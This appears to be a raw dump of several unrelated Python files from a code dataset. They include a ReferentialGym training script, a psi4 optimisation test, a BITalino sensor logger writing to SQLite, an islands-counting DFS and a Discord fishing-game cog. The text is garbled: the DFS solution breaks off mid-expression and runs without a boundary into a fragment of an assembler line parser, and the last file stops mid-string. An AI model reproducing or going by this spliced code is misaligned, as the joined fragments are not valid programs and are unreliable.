[\"BN64\",\"BN64\",\"BN32\",\"BN32\"]\n else:\n agent_config[\"cnn_decoder_channels\"] = [64,64,32,32]\n \n if \"3x3\" in agent_config[\"decoder_architecture\"]:\n agent_config[\"cnn_decoder_kernels\"] = [3,3,3,3]\n elif \"3x4x4x7\" in agent_config[\"decoder_architecture\"]:\n agent_config[\"cnn_decoder_kernels\"] = [3,4,4,7]\n else:\n agent_config[\"cnn_decoder_kernels\"] = [4,4,4,4]\n agent_config[\"cnn_decoder_strides\"] = [2,2,2,2]\n agent_config[\"cnn_decoder_paddings\"] = [1,1,1,1]\n \n ### MLP:\n if \"BN\" in agent_config[\"decoder_architecture\"]:\n agent_config['mlp_decoder_fc_hidden_units'] = [\"BN256\", \"BN256\"]\n else:\n agent_config['mlp_decoder_fc_hidden_units'] = [256, 256]\n agent_config['mlp_decoder_fc_hidden_units'].append(40*6)\n \n else:\n raise NotImplementedError\n\n\n save_path = \"./\"\n if args.parent_folder != '':\n save_path += args.parent_folder+'/'\n save_path += f\"{args.dataset}+DualLabeled/\"\n if args.symbolic:\n save_path += f\"Symbolic/\"\n save_path += f\"{nbr_epoch}Ep_Emb{rg_config['symbol_embedding_size']}_CNN{cnn_feature_size}to{args.vae_nbr_latent_dim}\"\n if args.shared_architecture:\n save_path += \"/shared_architecture\"\n save_path += f\"Dropout{rg_config['dropout_prob']}_DPEmb{rg_config['embedding_dropout_prob']}\"\n save_path += f\"_BN_{rg_config['agent_learning']}/\"\n save_path += f\"{rg_config['agent_loss_type']}\"\n \n if 'dSprites' in args.dataset: \n train_test_strategy = f\"-{test_split_strategy}\"\n if test_split_strategy != train_split_strategy:\n train_test_strategy = f\"/train_{train_split_strategy}/test_{test_split_strategy}\"\n save_path += 
f\"/dSprites{train_test_strategy}\"\n    \n    save_path += f\"/OBS{rg_config['stimulus_resize_dim']}X{rg_config['stimulus_depth_dim']}C-Rep{rg_config['nbr_experience_repetition']}\"\n    \n    if rg_config['use_curriculum_nbr_distractors']:\n        save_path += f\"+W{rg_config['curriculum_distractors_window_size']}Curr\"\n    if rg_config['with_utterance_penalization']:\n        save_path += \"+Tau-10-OOV{}PenProb{}\".format(rg_config['utterance_factor'], rg_config['utterance_oov_prob'])  \n    if rg_config['with_utterance_promotion']:\n        save_path += \"+Tau-10-OOV{}ProProb{}\".format(rg_config['utterance_factor'], rg_config['utterance_oov_prob'])  \n    \n    if rg_config['with_gradient_clip']:\n        save_path += '+ClipGrad{}'.format(rg_config['gradient_clip'])\n    \n    if rg_config['with_speaker_entropy_regularization']:\n        save_path += 'SPEntrReg{}'.format(rg_config['entropy_regularization_factor'])\n    if rg_config['with_listener_entropy_regularization']:\n        save_path += 'LSEntrReg{}'.format(rg_config['entropy_regularization_factor'])\n    \n    if rg_config['iterated_learning_scheme']:\n        save_path += f\"-ILM{rg_config['iterated_learning_period']}{'+RehearseMDL{}'.format(rg_config['iterated_learning_rehearse_MDL_factor']) if rg_config['iterated_learning_rehearse_MDL'] else ''}\"\n    \n    if rg_config['with_mdl_principle']:\n        save_path += '-MDL{}'.format(rg_config['mdl_principle_factor'])\n    \n    # N.B.: the config stores None (not the string 'None'), so test identity, not string equality:\n    if rg_config['cultural_pressure_it_period'] is not None: \n        save_path += '-S{}L{}-{}-Reset{}'.\\\n        format(rg_config['cultural_speaker_substrate_size'], \n            rg_config['cultural_listener_substrate_size'],\n            rg_config['cultural_pressure_it_period'],\n            rg_config['cultural_reset_strategy']+str(rg_config['cultural_reset_meta_learning_rate']) if 'meta' in rg_config['cultural_reset_strategy'] else rg_config['cultural_reset_strategy'])\n    \n    save_path += '-{}{}CulturalAgent-SEED{}-{}-obs_b{}_minib{}_lr{}-{}-tau0-{}-{}DistrTrain{}Test{}-stim{}-vocab{}over{}_{}{}'.\\\n        format(\n        'ObjectCentric' if rg_config['object_centric'] else '',\n        'Descriptive{}'.format(rg_config['descriptive_target_ratio']) if rg_config['descriptive'] else '',\n        seed,\n        rg_config['observability'], \n        rg_config['batch_size'], \n        args.mini_batch_size,\n        rg_config['learning_rate'],\n        rg_config['graphtype'], \n        rg_config['tau0'], \n        rg_config['distractor_sampling'],\n        *rg_config['nbr_distractors'].values(), \n        rg_config['nbr_stimulus'], \n        rg_config['vocab_size'], \n        rg_config['max_sentence_length'], \n        rg_config['agent_architecture'],\n        f\"/{'Detached' if args.vae_detached_featout else ''}beta{vae_beta}-factor{factor_vae_gamma}\" if 'BetaVAE' in rg_config['agent_architecture'] else ''\n        )\n\n    if 'MONet' in rg_config['agent_architecture'] or 'BetaVAE' in rg_config['agent_architecture']:\n        save_path += f\"beta{vae_beta}-factor{factor_vae_gamma}-gamma{monet_gamma}-sigma{vae_observation_sigma}\" if 'MONet' in rg_config['agent_architecture'] else ''\n        save_path += f\"CEMC{maxCap}over{nbrepochtillmaxcap}\" if vae_constrainedEncoding else ''\n        save_path += f\"UnsupSeg{rg_config['unsupervised_segmentation_factor']}\" if rg_config['unsupervised_segmentation_factor'] is not None else ''\n        save_path += f\"LossVAECoeff{args.vae_lambda}_{'UseMu' if args.vae_use_mu_value else ''}\"\n\n    if rg_config['use_feat_converter']:\n        save_path += f\"+FEATCONV\"\n    \n    if rg_config['use_homoscedastic_multitasks_loss']:\n        save_path += '+Homo'\n    \n    save_path += f\"/{args.optimizer_type}/\"\n\n    if 'reinforce' in args.graphtype:\n        save_path += f'/REINFORCE_EntropyCoeffNeg1m3/UnnormalizedDetLearningSignalHavrylovLoss/NegPG/'\n\n    if 
'obverter' in args.graphtype:\n save_path += f\"Obverter{args.obverter_threshold_to_stop_message_generation}-{args.obverter_nbr_games_per_round}GPR/DEBUG/\"\n else:\n save_path += f\"STGS-{args.agent_type}-{args.rnn_type}-CNN-Agent/\"\n\n save_path += f\"Periodic{args.metric_epoch_period}TS+DISComp-{'fast-' if args.metric_fast else ''}/\"#TestArchTanh/\"\n \n save_path += f'DatasetRepTrain{args.nbr_train_dataset_repetition}Test{args.nbr_test_dataset_repetition}'\n \n rg_config['save_path'] = save_path\n \n print(save_path)\n\n from ReferentialGym.utils import statsLogger\n logger = statsLogger(path=save_path,dumpPeriod=100)\n \n # # Agents\n batch_size = 4\n nbr_distractors = 1 if \"partial\" in rg_config[\"observability\"] else agent_config[\"nbr_distractors\"][\"train\"]\n nbr_stimulus = agent_config[\"nbr_stimulus\"]\n obs_shape = [nbr_distractors+1,nbr_stimulus, rg_config[\"stimulus_depth_dim\"],rg_config[\"stimulus_resize_dim\"],rg_config[\"stimulus_resize_dim\"]]\n vocab_size = rg_config[\"vocab_size\"]\n max_sentence_length = rg_config[\"max_sentence_length\"]\n\n if \"obverter\" in args.graphtype:\n from ReferentialGym.agents import DifferentiableObverterAgent\n speaker = DifferentiableObverterAgent(\n kwargs=agent_config, \n obs_shape=obs_shape, \n vocab_size=vocab_size, \n max_sentence_length=max_sentence_length,\n agent_id=\"s0\",\n logger=logger,\n use_sentences_one_hot_vectors=args.use_sentences_one_hot_vectors,\n differentiable=args.differentiable\n )\n else:\n if \"Baseline\" in args.agent_type:\n if 'lstm' in args.rnn_type.lower():\n from ReferentialGym.agents import LSTMCNNSpeaker\n speaker = LSTMCNNSpeaker(\n kwargs=agent_config, \n obs_shape=obs_shape, \n vocab_size=vocab_size, \n max_sentence_length=max_sentence_length,\n agent_id=\"s0\",\n logger=logger\n )\n elif 'gru' in args.rnn_type.lower():\n from ReferentialGym.agents import GRUCNNSpeaker\n speaker = GRUCNNSpeaker(\n kwargs=agent_config, \n obs_shape=obs_shape, \n vocab_size=vocab_size, \n max_sentence_length=max_sentence_length,\n agent_id=\"s0\",\n logger=logger\n )\n else:\n raise NotImplementedError\n elif \"EoSPriored\" in args.agent_type:\n from ReferentialGym.agents import EoSPrioredLSTMCNNSpeaker\n speaker = EoSPrioredLSTMCNNSpeaker(\n kwargs=agent_config, \n obs_shape=obs_shape, \n vocab_size=vocab_size, \n max_sentence_length=max_sentence_length,\n agent_id=\"s0\",\n logger=logger\n )\n print(\"Speaker:\", speaker)\n\n listener_config = copy.deepcopy(agent_config)\n if args.shared_architecture:\n listener_config[\"cnn_encoder\"] = speaker.cnn_encoder \n listener_config[\"nbr_distractors\"] = rg_config[\"nbr_distractors\"][\"train\"]\n batch_size = 4\n nbr_distractors = listener_config[\"nbr_distractors\"]\n nbr_stimulus = listener_config[\"nbr_stimulus\"]\n obs_shape = [nbr_distractors+1,nbr_stimulus, rg_config[\"stimulus_depth_dim\"],rg_config[\"stimulus_resize_dim\"],rg_config[\"stimulus_resize_dim\"]]\n vocab_size = rg_config[\"vocab_size\"]\n max_sentence_length = rg_config[\"max_sentence_length\"]\n\n if \"obverter\" in args.graphtype:\n raise NotImplementedError\n else:\n if 'lstm' in args.rnn_type.lower():\n from ReferentialGym.agents import LSTMCNNListener\n listener = LSTMCNNListener(\n kwargs=listener_config, \n obs_shape=obs_shape, \n vocab_size=vocab_size, \n max_sentence_length=max_sentence_length,\n agent_id=\"l0\",\n logger=logger\n )\n elif 'gru' in args.rnn_type.lower():\n from ReferentialGym.agents import GRUCNNListener\n listener = GRUCNNListener(\n kwargs=listener_config, \n 
obs_shape=obs_shape, \n vocab_size=vocab_size, \n max_sentence_length=max_sentence_length,\n agent_id=\"l0\",\n logger=logger\n )\n else:\n raise NotImplementedError\n\n if args.symbolic:\n assert args.agent_loss_type.lower() == 'ce'\n listener.input_stream_ids[\"listener\"][\"target_output\"] = \"current_dataloader:sample:speaker_exp_latents\"\n \n print(\"Listener:\", listener)\n\n # # Dataset:\n need_dict_wrapping = {}\n\n if \"dSprites\" in args.dataset:\n root = \"./datasets/dsprites-dataset\"\n train_dataset = ReferentialGym.datasets.dSpritesDataset(root=root, train=True, transform=rg_config[\"train_transform\"], split_strategy=train_split_strategy)\n test_dataset = ReferentialGym.datasets.dSpritesDataset(root=root, train=False, transform=rg_config[\"test_transform\"], split_strategy=test_split_strategy)\n else:\n raise NotImplementedError\n \n \n ## Modules:\n modules = {}\n\n from ReferentialGym import modules as rg_modules\n\n # Population:\n population_handler_id = \"population_handler_0\"\n population_handler_config = rg_config\n population_handler_stream_ids = {\n \"current_speaker_streams_dict\":\"modules:current_speaker\",\n \"current_listener_streams_dict\":\"modules:current_listener\",\n \"epoch\":\"signals:epoch\",\n \"mode\":\"signals:mode\",\n \"global_it_datasample\":\"signals:global_it_datasample\",\n }\n\n # Current Speaker:\n current_speaker_id = \"current_speaker\"\n\n # Current Listener:\n current_listener_id = \"current_listener\"\n\n modules[population_handler_id] = rg_modules.build_PopulationHandlerModule(\n id=population_handler_id,\n prototype_speaker=speaker,\n prototype_listener=listener,\n config=population_handler_config,\n input_stream_ids=population_handler_stream_ids)\n\n modules[current_speaker_id] = rg_modules.CurrentAgentModule(id=current_speaker_id,role=\"speaker\")\n modules[current_listener_id] = rg_modules.CurrentAgentModule(id=current_listener_id,role=\"listener\")\n \n homo_id = \"homo0\"\n homo_config = {\"use_cuda\":args.use_cuda}\n if args.homoscedastic_multitasks_loss:\n modules[homo_id] = rg_modules.build_HomoscedasticMultiTasksLossModule(\n id=homo_id,\n config=homo_config,\n )\n \n ## Pipelines:\n pipelines = {}\n\n # 0) Now that all the modules are known, let us build the optimization module:\n optim_id = \"global_optim\"\n optim_config = {\n \"modules\":modules,\n \"learning_rate\":args.lr,\n \"optimizer_type\":args.optimizer_type,\n \"with_gradient_clip\":rg_config[\"with_gradient_clip\"],\n \"adam_eps\":rg_config[\"adam_eps\"],\n }\n\n optim_module = rg_modules.build_OptimizationModule(\n id=optim_id,\n config=optim_config,\n )\n modules[optim_id] = optim_module\n\n grad_recorder_id = \"grad_recorder\"\n grad_recorder_module = rg_modules.build_GradRecorderModule(id=grad_recorder_id)\n modules[grad_recorder_id] = grad_recorder_module\n\n topo_sim_metric_id = \"topo_sim_metric\"\n topo_sim_metric_module = rg_modules.build_TopographicSimilarityMetricModule(id=topo_sim_metric_id,\n config = {\n \"parallel_TS_computation_max_workers\":16,\n \"epoch_period\":args.metric_epoch_period,\n \"fast\":args.metric_fast,\n \"verbose\":False,\n \"vocab_size\":rg_config[\"vocab_size\"],\n }\n )\n modules[topo_sim_metric_id] = topo_sim_metric_module\n\n inst_coord_metric_id = \"inst_coord_metric\"\n inst_coord_metric_module = rg_modules.build_InstantaneousCoordinationMetricModule(id=inst_coord_metric_id,\n config = {\n \"epoch_period\":1,\n }\n )\n modules[inst_coord_metric_id] = inst_coord_metric_module\n \n dsprites_latent_metric_id = 
\"dsprites_latent_metric\"\n dsprites_latent_metric_module = rg_modules.build_dSpritesPerLatentAccuracyMetricModule(id=dsprites_latent_metric_id,\n config = {\n \"epoch_period\":1,\n }\n )\n modules[dsprites_latent_metric_id] = dsprites_latent_metric_module\n \n speaker_factor_vae_disentanglement_metric_id = \"speaker_factor_vae_disentanglement_metric\"\n speaker_factor_vae_disentanglement_metric_input_stream_ids = {\n \"model\":\"modules:current_speaker:ref:ref_agent:cnn_encoder\",\n \"representations\":\"modules:current_speaker:ref:ref_agent:features\",\n \"experiences\":\"current_dataloader:sample:speaker_experiences\", \n \"latent_representations\":\"current_dataloader:sample:speaker_exp_latents\", \n \"latent_values_representations\":\"current_dataloader:sample:speaker_exp_latents_values\",\n \"indices\":\"current_dataloader:sample:speaker_indices\", \n }\n speaker_factor_vae_disentanglement_metric_module = rg_modules.build_FactorVAEDisentanglementMetricModule(\n id=speaker_factor_vae_disentanglement_metric_id,\n input_stream_ids=speaker_factor_vae_disentanglement_metric_input_stream_ids,\n config = {\n \"epoch_period\":args.metric_epoch_period,\n \"batch_size\":64,#5,\n \"nbr_train_points\":10000,#3000,\n \"nbr_eval_points\":5000,#2000,\n \"resample\":False,\n \"threshold\":5e-2,#0.0,#1.0,\n \"random_state_seed\":args.seed,\n \"verbose\":False,\n \"active_factors_only\":True,\n }\n )\n modules[speaker_factor_vae_disentanglement_metric_id] = speaker_factor_vae_disentanglement_metric_module\n\n listener_factor_vae_disentanglement_metric_id = \"listener_factor_vae_disentanglement_metric\"\n listener_factor_vae_disentanglement_metric_input_stream_ids = {\n \"model\":\"modules:current_listener:ref:ref_agent:cnn_encoder\",\n \"representations\":\"modules:current_listener:ref:ref_agent:rnn_outputs\",\n \"experiences\":\"current_dataloader:sample:speaker_experiences\", \n \"latent_representations\":\"current_dataloader:sample:speaker_exp_latents\", \n \"latent_values_representations\":\"current_dataloader:sample:speaker_exp_latents_values\",\n \"indices\":\"current_dataloader:sample:speaker_indices\", \n }\n listener_factor_vae_disentanglement_metric_module = rg_modules.build_FactorVAEDisentanglementMetricModule(\n id=listener_factor_vae_disentanglement_metric_id,\n input_stream_ids=listener_factor_vae_disentanglement_metric_input_stream_ids,\n config = {\n \"epoch_period\":args.metric_epoch_period,\n \"batch_size\":64,#5,\n \"nbr_train_points\":10000,#3000,\n \"nbr_eval_points\":5000,#2000,\n \"resample\":False,\n \"threshold\":5e-2,#0.0,#1.0,\n \"random_state_seed\":args.seed,\n \"verbose\":False,\n \"active_factors_only\":True,\n }\n )\n modules[listener_factor_vae_disentanglement_metric_id] = listener_factor_vae_disentanglement_metric_module\n\n logger_id = \"per_epoch_logger\"\n logger_module = rg_modules.build_PerEpochLoggerModule(id=logger_id)\n modules[logger_id] = logger_module\n\n pipelines[\"referential_game\"] = [\n population_handler_id,\n current_speaker_id,\n current_listener_id\n ]\n\n pipelines[optim_id] = []\n if args.homoscedastic_multitasks_loss:\n pipelines[optim_id].append(homo_id)\n pipelines[optim_id].append(optim_id)\n \"\"\"\n # Add gradient recorder module for debugging purposes:\n pipelines[optim_id].append(grad_recorder_id)\n \"\"\"\n pipelines[optim_id].append(speaker_factor_vae_disentanglement_metric_id)\n pipelines[optim_id].append(listener_factor_vae_disentanglement_metric_id)\n pipelines[optim_id].append(topo_sim_metric_id)\n 
pipelines[optim_id].append(inst_coord_metric_id)\n    pipelines[optim_id].append(dsprites_latent_metric_id)\n    pipelines[optim_id].append(logger_id)\n\n    rg_config[\"modules\"] = modules\n    rg_config[\"pipelines\"] = pipelines\n\n\n    dataset_args = {\n        \"dataset_class\": \"DualLabeledDataset\",\n        \"modes\": {\"train\": train_dataset,\n            \"test\": test_dataset,\n        },\n        \"need_dict_wrapping\": need_dict_wrapping,\n        \"nbr_stimulus\": rg_config[\"nbr_stimulus\"],\n        \"distractor_sampling\": rg_config[\"distractor_sampling\"],\n        \"nbr_distractors\": rg_config[\"nbr_distractors\"],\n        \"observability\": rg_config[\"observability\"],\n        \"object_centric\": rg_config[\"object_centric\"],\n        \"descriptive\": rg_config[\"descriptive\"],\n        \"descriptive_target_ratio\": rg_config[\"descriptive_target_ratio\"],\n    }\n\n    refgame = ReferentialGym.make(config=rg_config, dataset_args=dataset_args)\n\n    # In[22]:\n\n    refgame.train(nbr_epoch=nbr_epoch,\n                logger=logger,\n                verbose_period=1)\n\n    logger.flush()\n\nif __name__ == \"__main__\":\n    main()\n","sub_path":"zoo/referential-games+disentanglement/train_discriminative.py","file_name":"train_discriminative.py","file_ext":"py","file_size_in_byte":38801,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"}
{"seq_id":"386279376","text":"#! SCF STO-3G geometry optimization, with Z-matrix input\nimport psi4\nimport optking\n# These values are from a tightly converged QChem run\n\ndef test_opt1_h2o():\n    refnucenergy = 8.9064890670 #TEST\n    refenergy = -74.965901192 #TEST\n    \n    h2o = psi4.geometry(\"\"\"\n     O\n     H 1 1.0\n     H 1 1.0 2 104.5\n    \"\"\")\n\n    psi4.core.clean_options()\n\n    psi4_options = {\n        'diis': False,\n        'basis': 'sto-3g',\n        'e_convergence': 10,\n        'd_convergence': 10,\n        'scf_type': 'pk'\n    } \n\n    psi4.set_options(psi4_options)\n    \n    json_output = optking.optimize_psi4('hf')\n    E = json_output['energies'][-1]\n    nucenergy = json_output['trajectory'][-1]['properties']['nuclear_repulsion_energy']\n    \n    assert psi4.compare_values(refnucenergy, nucenergy, 3, \"Nuclear repulsion energy\") #TEST\n    assert psi4.compare_values(refenergy, E, 6, \"Reference energy\") #TEST\n","sub_path":"tests/test_test1.py","file_name":"test_test1.py","file_ext":"py","file_size_in_byte":1066,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"}
{"seq_id":"234677236","text":"#!/usr/bin/env python\nimport sqlite3\nimport bitalino\nimport time\nimport numpy\nfrom scipy import signal\n\ndef highpass(data, BUTTER_ORDER=3, sampling_rate=100, cut_off=0.7):\n    Wn = (float(cut_off) / (float(sampling_rate) / 2.0), 0.95)\n    b, a = signal.butter(BUTTER_ORDER, Wn, 'pass')\n    return signal.filtfilt(b, a, data, axis=0)\n\nprint(\"BITalino Data Collection\")\n#time.sleep(2)\n\n# Database\ndatabase = \"data.db\"\n#database = \"C:\\\\Users\\\\User\\\\Desktop\\\\Teste\\\\SQlite_example\"\n\n# Device MacAddress: Blt1 = 98:D3:81:FD:61:22, Blt2 = 20:15:12:22:81:68\nmacAddress = \"98:D3:81:FD:61:22\"\n\n# Acquisition Channels ([0-5])\nacqChannels = [0,1,2,3,4,5]\n\n# Sampling Frequency (Hz)\nsamplingFreq = 10\n\n# Compute Average Time (s)\ntimeCycle = 1\n\n# Acquisition Time (s) - None for Infinite\nacquisitionTime = 5\n\n\ndatabase = sqlite3.connect(database)\ncursor = database.cursor()\n\n# Restart Database (IF EXISTS keeps this from failing on a fresh database file)\ncursor.execute(\"Drop table if exists Configuration\")\ncursor.execute(\"Drop table if exists Data\")\n\ntry:\n    cursor.execute(\"CREATE TABLE Configuration(Id INTEGER PRIMARY KEY, MacAddress TEXT, SamplingFreq INT, InitTime TEXT, timeCycle INT, acqChannels TEXT, channelSize INT)\")\n    cursor.execute(\"CREATE TABLE Data(Configuration INT, Time INT, Channel0 REAL, Channel1 REAL, Channel2 REAL, Channel3 REAL, Channel4 REAL, Channel5 REAL, FOREIGN KEY(Configuration) REFERENCES Configuration(Id))\")\nexcept Exception as e:\n    pass\n\ndevice = bitalino.BITalino(macAddress)\ndevice.start(samplingFreq, acqChannels)\nprint(\"Device connected.\")\n\ncursor.execute(\"INSERT INTO Configuration(MacAddress, SamplingFreq, InitTime, timeCycle, acqChannels, channelSize) VALUES\" +\n    \"('\" + macAddress + \"',\" + str(samplingFreq) + \",'\" + time.strftime(\"%c\") + \"', \" + str(timeCycle) + \",'\" + str(acqChannels) + \"',\" + str(len(acqChannels)) + \");\")\ndatabase.commit()\n\nlastIndex = cursor.lastrowid\nprint(\"Current Configuration ID: \" + str(lastIndex))\nprint(\"Collecting data.\")\n\ncurrentTime = 0\nwhile (acquisitionTime is None) or (acquisitionTime > 0):\n    avg_data = [lastIndex, currentTime, None, None, None, None, None, None]\n    data = device.read(samplingFreq*timeCycle)\n    \"\"\"\n    Values acquired per second:\n    \tFrequency = 10Hz => 10 values\n    \tFrequency = 100Hz => 100 values\n    \t...\n    \t...\n    \tdata[:,5] => Channel 1 (on BITalino)\n    \tdata[:,6] => Channel 2\n    \tdata[:,7] => Channel 3\n    \tdata[:,8] => Channel 4\n    \tdata[:,9] => Channel 5\n    \tdata[:,10] => Channel 6\n    \"\"\"\n    y_acc = data[:,5]\n    #yhat = highpass(y_acc,3,1000,0.7)\n    print(\"%=====================%\")\n    #print(\"data[:,5]\")\n    #print(y_acc)\t# acc data for channel 1\n    #print(y_acc[2])\t# acc data for channel 1\n    #print(yhat[2])\t# acc data for channel 1\n    #print(y_acc.shape)\n    print(\"%=====================%\")\n\n    min_acc = min(data[:,5])\n    max_acc = max(data[:,5])\n\n    print(min_acc)\n    print(max_acc)\n    \n    \"\"\"\n    Apply filter to acc data here\n    \"\"\"
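\n    # A minimal sketch of how the highpass() helper defined above could be\n    # applied at the placeholder point the docstring asks for; the order and\n    # cut-off values are assumptions mirroring the commented-out call near the\n    # top of the loop, and the call stays commented out because filtfilt needs\n    # more samples than samplingFreq*timeCycle provides at 10 Hz:\n    #y_filtered = highpass(y_acc, BUTTER_ORDER=3, sampling_rate=samplingFreq, cut_off=0.7)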
\n\n    for ind in range(5, data.shape[1]):\n        avg_data[acqChannels[ind - 5] + 2] = numpy.mean(numpy.fabs(data[:,ind]))\n        # print(ind)\n    # Apply transfer functions here;\n    #avg_data[2] = ((avg_data[2] - 208)/(312 - 208))*2-1\n    avg_data_conv = ((avg_data[2]-min_acc)/(max_acc-min_acc))*2-1\n    print(\"Acc mean: = \", avg_data[2])\n    print(\"Acc mean conv: = \", abs(avg_data_conv))\n    cursor.execute(\"INSERT INTO Data(Configuration, Time, Channel0, Channel1, Channel2, Channel3, Channel4, Channel5) VALUES\" +\n        \"(\" + str(avg_data).replace(\"None\", \"null\")[1:-1] + \");\")\n    database.commit()\n    currentTime += timeCycle\n    if acquisitionTime is not None:\n        acquisitionTime -= timeCycle\n\ndevice.stop()\ndevice.close()\nprint(\"Connection closed.\")\n\n# UnComment to Print Tables\n\n\"\"\"\nprint(\"\")\nprint(\"Configurations:\")\ncursor.execute(\"Select * from Configuration where Configuration \")\nfor config in cursor.fetchall():\n    print(config)\nprint(\"\")\nprint(\"Data:\")\ncursor.execute(\"Select * from Data\")\nfor data in cursor.fetchall():\n    print(data)\n\"\"\"\nprint(\"Program will close.\")\ntime.sleep(1)\n","sub_path":"BITalino/BITalino_SQLite.py","file_name":"BITalino_SQLite.py","file_ext":"py","file_size_in_byte":4043,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"}
{"seq_id":"290321403","text":"\nfrom typing import List\n\n#dfs\nclass Solution:\n    def numIslands(self, grid: List[List[str]]) -> int:\n        m, n = len(grid),len(grid[0])\n        count = 0\n\n        for i in range(m):\n            for j in range(n):\n                if grid[i][j] == '1':\n                    count += 1\n                    self._dfs(grid,i,j)\n        return count\n\n\n    def _dfs(self, grid, r, c):\n        grid[r][c]='0'\n        for x,y in ((r-1, c),(r+1,c),(r,c-1),(r,c+1)):\n            if 0<=x<len(grid) and 0<=y<len(grid[0]) and grid[x][y]=='1':\n                self._dfs(grid,x,y)
\n\t\t\t\tif len(blocks) >= 3:\n\t\t\t\t\tline_aux = text.replace(blocks[0], '', 1).replace(blocks[1], '', 1)\n\t\t\t\t\tself.codop = Codop(blocks[1])\n\t\t\t\t\tself.operand = Operand(line_aux[line_aux.find(blocks[2]) : ])\n\t\t\t\telse:\n\t\t\t\t\tself.codop = Codop('')\n\t\t\t\t\tself.operand = Operand('NULL')\n\n\tdef __str__(self):\n\t\tif self.comment:\n\t\t\treturn 'COMENTARIO'\n\t\telse:\n\t\t\treturn ( str(self.label) + '\\n' + str(self.codop)\n\t\t\t\t+ '\\n' + str(self.operand) )\n\n\tdef is_end(self):\n\t\treturn False if self.comment else self.codop.is_end()","sub_path":"Practica 1/Line.py","file_name":"Line.py","file_ext":"py","file_size_in_byte":1557,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"}
{"seq_id":"615458310","text":"import discord\nimport random\nfrom discord.ext import commands\nfrom data import database as db\nfrom helpers import utilityfunctions as util\n\nCOOLDOWN = 7200\nTRASH_ICONS = (\n    \":moyai:\",\n    \":stopwatch:\",\n    \":wrench:\",\n    \":pick:\",\n    \":nut_and_bolt:\",\n    \":gear:\",\n    \":toilet:\",\n    \":alembic:\",\n    \":bathtub:\",\n    \":scissors:\",\n    \":boot:\",\n    \":high_heel:\",\n    \":saxophone:\",\n    \":trumpet:\",\n    \":scooter:\",\n    \":anchor:\",\n    \":shopping_cart:\",\n    \":paperclips:\",\n    \":paperclip:\",\n    \":prayer_beads:\",\n    \":oil:\",\n    \":compression:\",\n    \":keyboard:\",\n    \":radio:\",\n    \":tv:\",\n    \":fax:\",\n    \":movie_camera:\",\n    \":projector:\",\n    \":guitar:\",\n    \":violin:\",\n)\n\n\nclass Fishy(commands.Cog):\n    def __init__(self, bot):\n        self.bot = bot\n        self.FISHTYPES = {\n            \"trash\": trash,\n            \"common\": fish_common,\n            \"uncommon\": fish_uncommon,\n            \"rare\": fish_rare,\n            \"legendary\": fish_legendary,\n        }\n        self.WEIGHTS = [9, 60, 20, 10, 1]\n\n    @commands.command(\n        aliases=[\"fish\", \"fihy\", \"fisy\", \"foshy\", \"fisyh\", \"fsihy\", \"fin\"]\n    )\n    async def fishy(self, ctx, user=None):\n        \"\"\"Go fishing and receive or give random fish.\n\n        Usage:\n            >fishy\n            >fishy <user>\n        \"\"\"\n        receiver = await util.get_member(ctx, user, fallback=ctx.author)\n        if receiver is not None and receiver is not ctx.author:\n            gift = True\n        else:\n            gift = False\n\n        fishdata = db.fishdata(ctx.author.id)\n        if fishdata is not None and fishdata.timestamp is not None:\n            time_since_fishy = ctx.message.created_at.timestamp() - fishdata.timestamp\n        else:\n            time_since_fishy = COOLDOWN\n\n        TESTING = False\n        if time_since_fishy < COOLDOWN and not TESTING:\n            not_yet_quotes = [\n                \"Bro chill, you can't fish yet! Please wait {time}\",\n                \"You can't fish yet, fool! Please wait {time}\",\n                \"You're fishing too fast! Please wait {time}\",\n                \"You're still on cooldown buddy. Please wait {time}\",\n                \"Please wait {time} to fish again!\",\n                \"Sorry, but you have to wait {time} to fish again!\",\n                \"Not so fast! 
Please wait {time}\",\n            ]\n            wait_time = f\"**{util.stringfromtime(COOLDOWN - time_since_fishy, 2)}**\"\n            await ctx.send(random.choice(not_yet_quotes).format(time=wait_time))\n        else:\n            catch = random.choices(list(self.FISHTYPES.keys()), self.WEIGHTS)[0]\n            amount = await self.FISHTYPES[catch](ctx, receiver, gift)\n            db.add_fishy(\n                receiver.id,\n                catch,\n                amount,\n                ctx.message.created_at.timestamp(),\n                fisher_id=(ctx.author.id if gift else None),\n            )\n\n    @commands.command(aliases=[\"fintimer\", \"fisytimer\", \"foshytimer\", \"ft\"])\n    async def fishytimer(self, ctx):\n        \"\"\"Check your fishy timer without actually fishing.\"\"\"\n        fishdata = db.fishdata(ctx.author.id)\n        if fishdata is not None and fishdata.timestamp is not None:\n            time_since_fishy = ctx.message.created_at.timestamp() - fishdata.timestamp\n\n            if time_since_fishy < COOLDOWN:\n                wait_time = f\"**{util.stringfromtime(COOLDOWN - time_since_fishy, 2)}**\"\n                # wait_time is already bold; no extra asterisks around it here\n                await ctx.send(f\":clock4: You will need to wait {wait_time} to fish again.\")\n            else:\n                await ctx.send(\":sparkles: Good news! You can fish right now!\")\n\n        else:\n            await ctx.send(\"You have never fished...?\")\n\n    @commands.command(aliases=[\"finstats\", \"fisystats\", \"foshystats\", \"fs\"])\n    async def fishystats(self, ctx, user=None):\n        \"\"\"Show fishing statistics.\n\n        Usage:\n            >fishystats\n            >fishystats <user>\n        \"\"\"\n        globaldata = user == \"global\"\n        if not globaldata:\n            user = await util.get_user(ctx, user, fallback=ctx.author)\n            fishdata = db.fishdata(user.id)\n            owner = user.name\n\n        else:\n            owner = \"global\"\n            fishdata = None\n            users = db.query(\"select user_id from fishy\")\n            for user_id in users:\n                user_fishdata = db.fishdata(user_id[0])\n                if fishdata is None:\n                    fishdata = user_fishdata\n                else:\n                    fishdata = fishdata._replace(\n                        fishy=fishdata.fishy + user_fishdata.fishy,\n                        fishy_gifted=fishdata.fishy_gifted + user_fishdata.fishy_gifted,\n                        trash=fishdata.trash + user_fishdata.trash,\n                        common=fishdata.common + user_fishdata.common,\n                        uncommon=fishdata.uncommon + user_fishdata.uncommon,\n                        rare=fishdata.rare + user_fishdata.rare,\n                        legendary=fishdata.legendary + user_fishdata.legendary,\n                    )\n\n        content = discord.Embed(\n            title=f\":fishing_pole_and_fish: {owner} fishy stats\",\n            color=discord.Color.blue(),\n        )\n        if fishdata is not None:\n            total = (\n                fishdata.trash\n                + fishdata.common\n                + fishdata.uncommon\n                + fishdata.rare\n                + fishdata.legendary\n            )\n            content.description = (\n                f\"Total fishy: 